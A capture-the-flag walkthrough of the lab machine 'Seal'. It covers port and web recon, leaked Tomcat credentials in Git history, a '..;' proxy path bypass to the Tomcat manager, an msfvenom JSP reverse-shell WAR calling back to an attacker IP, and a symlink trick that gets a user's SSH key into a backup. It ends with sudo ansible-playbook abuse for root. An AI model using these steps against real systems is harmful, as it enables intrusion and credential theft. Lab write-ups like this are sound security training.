Information Gathering

NMAP

  • command used: ( fast full TCP port scan; -T5 with --min-rate 5000 is noisy, fine on a lab target )

    sudo nmap -p- -sS --min-rate 5000 --open -T5 -vvv 10.10.10.250 -oG nmap/allPorts --defeat-rst-ratelimit 
  • command used: ( version and default-script scan of the ports found )

    nmap -A -sC -sV -p22,443,8080 10.10.11.105 -Pn -oA nmap/full_scan

-> All ports scan:

Reason: 65529 resets and 3 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
443/tcp  open  https      syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

-> Version scan of the open ports:

   Note: the command above points at 10.10.11.105, not 10.10.10.250, which is why 443 and 8080 show as closed here and the SSH version (OpenSSH 7.6p1, an Ubuntu 18.04 build) differs from the banner grabbed from the real target below (OpenSSH 8.2p1, Ubuntu 20.04). Treat the nc banner as authoritative for this box.

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
443/tcp  closed https
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Services

TCP 22 ( Default port for SSH )

-> SSH package version - the OpenSSH release string maps to a distribution release, so it usually reveals the OS and version.
-> SSH key fingerprint - has the key been re-used somewhere (another machine? the same machine on another port/service)?
-> SSH banner - any text shown before the password prompt (often a legal warning) may leak hostnames or ownership.

-> SSH package version:

nc -vn 10.10.10.250 22
  • output:
    └─$ nc -vn 10.10.10.250 22                                           
    (UNKNOWN) [10.10.10.250] 22 (ssh) open
    SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2

-> SSH key fingerprint:

ssh root@10.10.10.250
  • output:
    └─$ ssh root@10.10.10.250                                                     
    The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.
    ECDSA key fingerprint is SHA256:YTRJC++A+0ww97kJGc5DWAsnI9iusyCE4Nt9fomhxdA.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.10.250' (ECDSA) to the list of known hosts.
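To answer the "has this key been re-used" question from the checklist, collect host keys with ssh-keyscan and compare fingerprints across hosts. The following is an added Python example, not part of the original writeup: the keyscan lines and key blobs are constructed here (a synthetic ed25519 wire blob, not a real key) and the addresses other than 10.10.10.250 are placeholders. It produces both the MD5 colon-hex form that nmap's ssh-hostkey script prints and the SHA256 base64 form the OpenSSH client prints, so either can be matched against the scan output above.

```python
import base64
import hashlib
import struct
from collections import defaultdict


def ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire 'string': 4-byte big-endian length + data."""
    return struct.pack(">I", len(data)) + data


def fake_ed25519_blob(fill: int) -> bytes:
    """Constructed ed25519 public-key blob for the demo. The wire layout is the
    real one (string key type + string 32-byte key); the key bytes are a fill
    pattern, not a real key."""
    return ssh_string(b"ssh-ed25519") + ssh_string(bytes([fill]) * 32)


# Constructed ssh-keyscan style lines ("host keytype base64"). The first two
# hosts deliberately share a key; the third has its own. Addresses other than
# the target are placeholders.
KEYSCAN_LINES = [
    "10.10.10.250 ssh-ed25519 " + base64.b64encode(fake_ed25519_blob(0x41)).decode(),
    "10.10.10.251 ssh-ed25519 " + base64.b64encode(fake_ed25519_blob(0x41)).decode(),
    "10.10.10.252 ssh-ed25519 " + base64.b64encode(fake_ed25519_blob(0x42)).decode(),
]


def fingerprint_md5(blob: bytes) -> str:
    """MD5 colon-hex fingerprint of the decoded key blob, the form nmap's
    ssh-hostkey script prints (and ssh-keygen -l -E md5, minus the prefix)."""
    return ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())


def fingerprint_sha256(blob: bytes) -> str:
    """SHA256 fingerprint as the OpenSSH client prints it: base64, '=' padding stripped."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_keyscan(lines):
    """Yield (host, keytype, decoded_blob) for each non-comment keyscan line."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, keytype, b64 = line.split()[:3]
        yield host, keytype, base64.b64decode(b64)


def find_reused_keys(lines):
    """Map SHA256 fingerprint -> sorted list of hosts, keeping only keys seen on
    more than one host (the re-use the checklist asks about)."""
    seen = defaultdict(set)
    for host, _keytype, blob in parse_keyscan(lines):
        seen[fingerprint_sha256(blob)].add(host)
    return {fp: sorted(hosts) for fp, hosts in seen.items() if len(hosts) > 1}


if __name__ == "__main__":
    for host, keytype, blob in parse_keyscan(KEYSCAN_LINES):
        print(host, keytype, fingerprint_md5(blob), fingerprint_sha256(blob))
    for fp, hosts in find_reused_keys(KEYSCAN_LINES).items():
        print("host key reused:", fp, "on", ", ".join(hosts))
```

Feed it real data with `ssh-keyscan -t rsa,ecdsa,ed25519 10.10.10.250 > keys.txt` and read the lines from that file; a host key that also appears on a second address or port means the same machine (or a cloned image) is behind both.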

TCP 443 ( Default port for HTTPS )

-> Certificate:

-> Web Server:

curl -i https://10.10.10.250/ -k
HTTP/1.1 200 
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 05 Nov 2021 16:51:29 GMT
Content-Type: text/html
Content-Length: 19737
Connection: keep-alive
Accept-Ranges: bytes
ETag: W/"19737-1620221190102"
Last-Modified: Wed, 05 May 2021 13:26:30 GMT

<!DOCTYPE html>
<html lang="en">

<head>
  <!-- basic -->
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <!-- mobile metas -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="viewport" content="initial-scale=1, maximum-scale=1">
  <!-- site metas -->
  <title>Seal Market</title>

The Server header says nginx, but the ETag format W/"<length>-<mtime>" is how Tomcat's DefaultServlet builds weak ETags, an early hint that nginx is proxying to Tomcat.

-> Directory brute force:

gobuster dir -u https://10.10.10.250/ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php -k

-> output:

└─$ gobuster dir -u https://10.10.10.250/ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.250/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/11/05 12:52:18 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 302) [Size: 0] [--> http://10.10.10.250/admin/]
/images               (Status: 302) [Size: 0] [--> http://10.10.10.250/images/]
/js                   (Status: 302) [Size: 0] [--> http://10.10.10.250/js/]    
/css                  (Status: 302) [Size: 0] [--> http://10.10.10.250/css/]   
/a                    (Status: 302) [Size: 0] [--> http://10.10.10.250/a/]     
/manager              (Status: 302) [Size: 0] [--> http://10.10.10.250/manager/]
/.                    (Status: 200) [Size: 19737]                               
/icon                 (Status: 302) [Size: 0] [--> http://10.10.10.250/icon/] 

The hit on /manager is the default path of the Tomcat Manager application, which confirms a Tomcat instance behind nginx.
Requesting /manager redirects to /manager/html, which is blocked, while /manager/status loads fine.

PORT 8080 ( http-proxy - GitBucket )

On port 8080 a GitBucket instance is running.

-> Directory brute force ( seal.htb resolves to the target, e.g. via /etc/hosts ):

wfuzz -u http://seal.htb:8080/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt --hw 0 
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                             
=====================================================================

000000025:   200        211 L    449 W      8982 Ch     "register"                                                          
000000570:   404        15 L     24 W       365 Ch      "WEB-INF"                                            
000000634:   200        142 L    311 W      6892 Ch     "signin"

Nothing interesting, so let's register an account.
After creating the account and logging in we have access to two repositories.

Checking seal_market we can see that it runs Tomcat, and there is a ToDo in the README worth reading.

That explains why we could not access /manager/html the normal way; we will need a workaround for that.
The current tomcat-users.xml contains no credentials, but the commit history shows that the user luis removed them after uploading the Tomcat setup:

tomcat:42MrHBf*z8{Z%

With these credentials we can log in to /manager/status.

To reach the blocked /manager/html we can bypass the front-end restriction with /manager/status/..;/html. Tomcat treats ';' as the start of a path parameter and strips it from each segment before resolving '..', so it maps the request to /manager/html, while the proxy in front only sees a path under /manager/status/ and lets it through.
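The mismatch between the two path views is the whole trick, so here it is modelled in Python. This is an added example, not code from the writeup or from Tomcat/nginx: `proxy_view` models a front end that resolves '.' and '..' but treats ';' as an ordinary character, `tomcat_view` models Tomcat stripping ';param' from every segment before normalising, and the proxy rule (block anything whose normalised path starts with /manager/html) is an assumption about the target's configuration, which the writeup does not show.

```python
MANAGER_HTML = "/manager/html"


def resolve_dots(segments):
    """Resolve '.' and '..' segments (and collapse empty ones) into an absolute path.
    Both nginx and Tomcat do this step; they differ in what happens before it."""
    out = []
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def proxy_view(raw_path: str) -> str:
    """Path as a front-end proxy (nginx-style) sees it: '..' is resolved, but
    ';' is just a character, so the segment '..;' is NOT a dot-dot segment."""
    return resolve_dots(raw_path.split("/"))


def tomcat_view(raw_path: str) -> str:
    """Path as Tomcat maps it: path parameters (';...' in each segment) are
    removed first, so '..;' becomes '..' and climbs one directory."""
    segments = [seg.split(";", 1)[0] for seg in raw_path.split("/")]
    return resolve_dots(segments)


def proxy_allows(raw_path: str) -> bool:
    """Assumed front-end rule: block the manager GUI by normalised path prefix."""
    return not proxy_view(raw_path).startswith(MANAGER_HTML)


def request_outcome(raw_path: str):
    """Return (reaches_tomcat, path_tomcat_serves) for one request path."""
    if not proxy_allows(raw_path):
        return False, None
    return True, tomcat_view(raw_path)


if __name__ == "__main__":
    for path in ("/manager/html", "/manager/status/../html", "/manager/status/..;/html"):
        print(f"{path:32} proxy sees {proxy_view(path):24} -> {request_outcome(path)}")
```

The plain `/manager/status/../html` does not work because the proxy resolves the '..' itself and then blocks the result; only the ';' variant survives the proxy's normalisation while still being rewritten by Tomcat. The same rewrite applies to the manager's sub-paths, which is why the WAR upload below also goes through /manager/status/..;/html/....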

Now we can upload a WAR file through the manager to get a reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.95 LPORT=443 -f war > reverse.war

With a listener waiting on port 443, browse for the WAR in the manager's deploy form and intercept the request in Burp.

Rewrite the upload URL with the same ..; trick so it gets past the proxy, forward the request, then open the deployed application to trigger the JSP shell.

Privilege Escalation

Information Gathering ( Operating System )

tomcat@seal:/$ cat /etc/*-release  
DISTRIB_ID=Ubuntu  
DISTRIB_RELEASE=20.04  
DISTRIB_CODENAME=focal  
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"  
NAME="Ubuntu"  
VERSION="20.04.2 LTS (Focal Fossa)"  
ID=ubuntu  
ID_LIKE=debian  
PRETTY_NAME="Ubuntu 20.04.2 LTS"  
VERSION_ID="20.04"  
HOME_URL="https://www.ubuntu.com/"  
SUPPORT_URL="https://help.ubuntu.com/"  
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"  
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"  
VERSION_CODENAME=focal  
UBUNTU_CODENAME=focal

-> netstat:

tomcat@seal:/opt/backups/archives$ netstat -tulpn  
(Not all processes could be identified, non-owned process info  
 will not be shown, you would have to be root to see it all.)  
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                    
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -                    
tcp6       0      0 127.0.0.1:8000          :::*                    LISTEN      886/java              
tcp6       0      0 :::8080                 :::*                    LISTEN      -                    
tcp6       0      0 :::22                   :::*                    LISTEN      -                    
tcp6       0      0 :::443                  :::*                    LISTEN      -

Nothing interesting, except port 8000 bound to 127.0.0.1 by a java process (PID 886); we leave it for now.
After some manual enumeration we find an Ansible playbook at /opt/backups/playbook/run.yml:

tomcat@seal:/opt/backups/playbook$ cat run.yml
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/

The synchronize task runs with copy_links=yes, so symlinks under the dashboard directory are dereferenced and their targets are copied as regular files into the archive. As tomcat we can write to the uploads directory, so a symlink pointing at luis's private key gets his id_rsa into the next backup:

ln -s /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/id_rsa

Once a new archive appears in /opt/backups/archives, copy it into /dev/shm or /tmp, rename it to backup.tar.gz (despite the .gz name it is a gzipped tar) and extract it via tar -xvf backup.tar.gz. The extracted id_rsa, chmod 600, lets us ssh in as luis.
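To see exactly what copy_links=yes does to a planted symlink, here is a sandboxed model of run.yml in Python. This is an added example, not the writeup's or Ansible's code: `shutil.copytree(symlinks=False)` stands in for the rsync-based synchronize task (it follows symlinks and copies the targets), `shutil.make_archive` stands in for the archive task, and all paths, the "private key" and the uploads directory are constructed inside a temporary directory. The `dereference` switch shows the contrast with copy_links=no; who runs the real backup job is not stated on the page and is not modelled here.

```python
import os
import shutil
import tarfile
import tempfile


def simulate_backup(root: str, dereference: bool = True) -> str:
    """Model of run.yml: copy the dashboard directory (dereferencing symlinks
    when dereference=True, like copy_links=yes), archive it, remove the copy.
    Returns the path of the archive that was written."""
    src = os.path.join(root, "webapps_ROOT_admin_dashboard")   # stand-in for the tomcat dir
    files = os.path.join(root, "backups", "files")
    archives = os.path.join(root, "backups", "archives")
    os.makedirs(archives, exist_ok=True)
    # symlinks=False => copytree follows links and writes their targets as regular files
    shutil.copytree(src, files, symlinks=not dereference)
    archive = shutil.make_archive(os.path.join(archives, "backup-demo"), "gztar", root_dir=files)
    shutil.rmtree(files)                                        # the 'Clean' task
    return archive


def read_from_archive(archive: str, member_suffix: str) -> str:
    """Return the content of the first regular-file member whose name ends with
    member_suffix, without extracting anything to disk."""
    with tarfile.open(archive, "r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith(member_suffix):
                return tar.extractfile(member).read().decode()
    raise FileNotFoundError(f"no regular file ending in {member_suffix!r} in archive")


def demo(dereference: bool = True) -> str:
    """Build the sandbox: a constructed 'private key' outside the web root and a
    symlink to it inside uploads/, run the backup model and return what the
    archive holds for uploads/id_rsa."""
    root = tempfile.mkdtemp(prefix="seal-demo-")
    try:
        key = os.path.join(root, "home_luis_ssh", "id_rsa")      # stand-in for /home/luis/.ssh/id_rsa
        os.makedirs(os.path.dirname(key))
        with open(key, "w") as f:
            f.write("-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed-demo-key\n")
        uploads = os.path.join(root, "webapps_ROOT_admin_dashboard", "uploads")
        os.makedirs(uploads)
        os.symlink(key, os.path.join(uploads, "id_rsa"))          # the ln -s step
        archive = simulate_backup(root, dereference=dereference)
        return read_from_archive(archive, "uploads/id_rsa")
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

With `dereference=False` the symlink is archived as a symlink and `read_from_archive` finds no regular file, which is the behaviour a safe backup of a user-writable directory should have; copy_links=yes is what turns the writable uploads directory into a read primitive on anything the backup account can open.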

Privilege Escalation ( luis -> root )

Running sudo -l as luis shows that he can run /usr/bin/ansible-playbook * as any user without a password.

The wildcard lets us run any playbook we write, and ansible-playbook itself runs as root under sudo (the become: true in the task below is redundant but harmless), so this is arbitrary code execution as root, not just file access. Here we use it to read /root/root.txt, whose location we know.
https://docs.ansible.com/ansible/latest/user_guide/playbooks.html

- name: Ansible Copy Example Local to Remote
  hosts: localhost
  tasks:
    - name: copying file with playbook
      become: true 
      copy:
        src: /root/root.txt
        dest: /dev/shm
        owner: luis
        group: luis        
        mode: 0777

Running the playbook through sudo copies the flag into /dev/shm, and we have the ROOT flag!